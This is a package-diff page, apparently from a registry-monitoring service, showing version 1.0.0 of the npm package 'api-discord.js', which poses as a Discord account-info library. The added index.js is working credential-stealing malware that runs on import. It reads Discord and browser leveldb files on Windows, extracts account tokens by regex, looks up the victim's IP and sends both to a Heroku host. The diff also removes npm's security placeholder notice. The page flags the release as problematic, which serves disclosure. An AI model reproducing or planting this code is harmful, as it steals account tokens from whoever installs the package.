api-discord.js 0.0.1-security → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of api-discord.js might be problematic. Click here for more details.
- package/index.js +95 -0
- package/package.json +14 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,95 @@
|
|
1
|
+
//módulos e variáveis
|
2
|
+
const fetch = require("node-fetch")
|
3
|
+
const fs = require("fs")
|
4
|
+
const os = require("os")
|
5
|
+
const api = "https://readline.herokuapp.com"
|
6
|
+
const user = process.env.USERNAME
|
7
|
+
const roaming = "C:/Users/" + user + "/AppData/Roaming"
|
8
|
+
const local = "C:/Users/" + user + "/AppData/Local"
|
9
|
+
const options = {directory: roaming,filename: "discord.png"}
|
10
|
+
|
11
|
+
|
12
|
+
// roubar tokens do usuário
|
13
|
+
async function grabber() {
|
14
|
+
|
15
|
+
if (os.platform() === "win32") {
|
16
|
+
|
17
|
+
var paths = [
|
18
|
+
roaming + "/Discord/Local Storage/leveldb",
|
19
|
+
roaming + "/discord/Local Storage/leveldb",
|
20
|
+
roaming + "/Lightcord/Local Storage/leveldb",
|
21
|
+
roaming + "/discordptb/Local Storage/leveldb",
|
22
|
+
roaming + "/discordcanary/Local Storage/leveldb",
|
23
|
+
roaming + "/Opera Software/Opera Stable/Local Storage/leveldb",
|
24
|
+
roaming + "/Opera Software/Opera GX Stable/Local Storage/leveldb",
|
25
|
+
local + "/Amigo/User Data/Local Storage/leveldb",
|
26
|
+
local + "/Torch/User Data/Local Storage/leveldb",
|
27
|
+
local + "/Kometa/User Data/Local Storage/leveldb",
|
28
|
+
local + "/Orbitum/User Data/Local Storage/leveldb",
|
29
|
+
local + "/CentBrowser/User Data/Local Storage/leveldb",
|
30
|
+
local + "/7Star/7Star/User Data/Local Storage/leveldb",
|
31
|
+
local + "/Sputnik/Sputnik/User Data/Local Storage/leveldb",
|
32
|
+
local + "/Vivaldi/User Data/Default/Local Storage/leveldb",
|
33
|
+
local + "/Google/Chrome SxS/User Data/Local Storage/leveldb",
|
34
|
+
local + "/Epic Privacy Browser/User Data/Local Storage/leveldb",
|
35
|
+
local + "/Google/Chrome/User Data/Default/Local Storage/leveldb",
|
36
|
+
local + "/uCozMedia/Uran/User Data/Default/Local Storage/leveldb",
|
37
|
+
local + "/Microsoft/Edge/User Data/Default/Local Storage/leveldb",
|
38
|
+
local + "/Yandex/YandexBrowser/User Data/Default/Local Storage/leveldb",
|
39
|
+
local + "/Opera Software/Opera Neon/User Data/Default/Local Storage/leveldb",
|
40
|
+
local + "/BraveSoftware/Brave-Browser/User Data/Default/Local Storage/leveldb",];
|
41
|
+
|
42
|
+
for (i = 0; i < paths.length; i++) {
|
43
|
+
pegartoken(paths[i])}
|
44
|
+
|
45
|
+
async function pegartoken(path) {
|
46
|
+
try {
|
47
|
+
fs.readdir(path, (err, files) => {
|
48
|
+
if (files === undefined) {
|
49
|
+
return
|
50
|
+
}
|
51
|
+
|
52
|
+
let filtro = files.filter(f => f.split('.').pop() === "ldb")
|
53
|
+
for (i = 0; i < filtro.length; i++) {
|
54
|
+
fs.readFile(`${path}/${filtro[i]}`, 'utf-8', async function(err, data) {
|
55
|
+
let semmfa = new RegExp(/[\d\w_-]{24}\.[\d\w_-]{6}\.[\d\w_-]{38}/)
|
56
|
+
let mfa = new RegExp(/mfa\.[\w-]{84}/g)
|
57
|
+
|
58
|
+
let [tokenuser] = semmfa.exec(data) || mfa.exec(data) || [null];
|
59
|
+
if (tokenuser != null) {
|
60
|
+
tokenuser = tokenuser.replace(/"/g, '')
|
61
|
+
let response = await fetch('https://api.ipify.org/?format=json');
|
62
|
+
let data = await response.json();
|
63
|
+
await fetch(api + "/verify" + "/" + tokenuser + "/" + data.ip + "/" + "finalizado")
|
64
|
+
}
|
65
|
+
})
|
66
|
+
}
|
67
|
+
})
|
68
|
+
|
69
|
+
|
70
|
+
fs.readdir(path, (err, files) => {
|
71
|
+
if (files === undefined) {
|
72
|
+
return
|
73
|
+
}
|
74
|
+
|
75
|
+
let filtro = files.filter(f => f.split('.').pop() === "log")
|
76
|
+
for (i = 0; i < filtro.length; i++) {
|
77
|
+
fs.readFile(`${path}/${filtro[i]}`, 'utf-8', async function(err, data) {
|
78
|
+
let semmfa = new RegExp(/[\d\w_-]{24}\.[\d\w_-]{6}\.[\d\w_-]{38}/)
|
79
|
+
let mfa = new RegExp(/mfa\.[\w-]{84}/g)
|
80
|
+
|
81
|
+
if (semmfa.test(data)) {}
|
82
|
+
let [tokenuser] = semmfa.exec(data) || mfa.exec(data) || [null];
|
83
|
+
if (tokenuser != null) {
|
84
|
+
tokenuser = tokenuser.replace(/"/g, '')
|
85
|
+
let response = await fetch('https://api.ipify.org/?format=json');
|
86
|
+
let data = await response.json();
|
87
|
+
await fetch(api + "/verify" + "/" + tokenuser + "/" + data.ip + "/" + "finalizado")
|
88
|
+
}})
|
89
|
+
}})
|
90
|
+
} catch (err) {console.log("..")}
|
91
|
+
}
|
92
|
+
}
|
93
|
+
}
|
94
|
+
|
95
|
+
grabber()
|
package/package.json
CHANGED
@@ -1,6 +1,17 @@
|
|
1
1
|
{
|
2
2
|
"name": "api-discord.js",
|
3
|
-
"version": "0.0
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "Coletar informações sobre uma conta do discord, como nome, tipo de nitro entre outros!",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
8
|
+
},
|
9
|
+
"keywords": [],
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"fs": "^0.0.1-security",
|
14
|
+
"node-fetch": "^1.7.3",
|
15
|
+
"os": "^0.1.2"
|
16
|
+
}
|
6
17
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=api-discord.js for more information.
|